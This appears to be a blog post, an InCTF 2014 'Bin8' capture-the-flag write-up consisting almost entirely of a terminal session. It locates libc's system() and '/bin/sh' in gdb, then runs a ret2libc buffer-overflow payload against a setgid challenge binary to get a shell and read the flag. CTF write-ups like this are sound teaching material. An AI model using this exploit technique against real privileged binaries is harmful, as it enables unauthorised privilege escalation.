challenge8@inctf:~$ ldd challenge8 linux-gate.so.1 => (0xf7ffd000) libc.so.6 => /lib32/libc.so.6 (0xf7e4e000) /lib/ld-linux.so.2 (0x56555000) challenge8@inctf:~$ gdb challenge8 Reading symbols from /home/challenge8/challenge8...done. (gdb) break main Reading in symbols for /home/challenge8/challenge8.c...done. Breakpoint 1 at 0x80484ab: file /home/challenge8/challenge8.c, line 17. (gdb) r Starting program: /home/challenge8/challenge8 Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done. Loaded symbols for /lib/ld-linux.so.2 Reading symbols from system-supplied DSO at 0xf7fdb000...(no debugging symbols found)...done. Reading symbols from /lib32/libc.so.6...(no debugging symbols found)...done. Loaded symbols for /lib32/libc.so.6 Breakpoint 1, main (argc=1, argv=0xffffd6f4) at /home/challenge8/challenge8.c:17 17 /home/challenge8/challenge8.c: No such file or directory. (gdb) x system 0xf7e6b250: 0x891cec83 (gdb) find 0xf7e4e000, 0xffffffff, "/bin/sh" 0xf7f8aa2c warning: Unable to access target memory at 0xf7fd0f34, halting search. 1 pattern found. (gdb) x/s 0xf7f8aa2c 0xf7f8aa2c: "/bin/sh" (gdb) quit A debugging session is active. Inferior 1 [process 790] will be killed. Quit anyway? (y or n) y challenge8@inctf:~$ id uid=1016(challenge8) gid=1016(challenge8) groups=1016(challenge8),1001(ctf) challenge8@inctf:~$ ./challenge8 `python -c 'print "A" * 76+ "\x50\xb2\xe6\xf7" + "AAAA" + "\x2c\xaa\xf8\xf7"'` This is the content of buffer: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP���AAAA,�� $ id uid=1016(challenge8) gid=1016(challenge8) egid=1017(flag8) groups=1016(challenge8),1001(ctf) $ cat /home/flag8/flag8 v6rjR2kw3adHwbh4 $
Thursday, March 6, 2014
InCTF 2014 Bin8 WriteUp
Subscribe to:
Posts (Atom)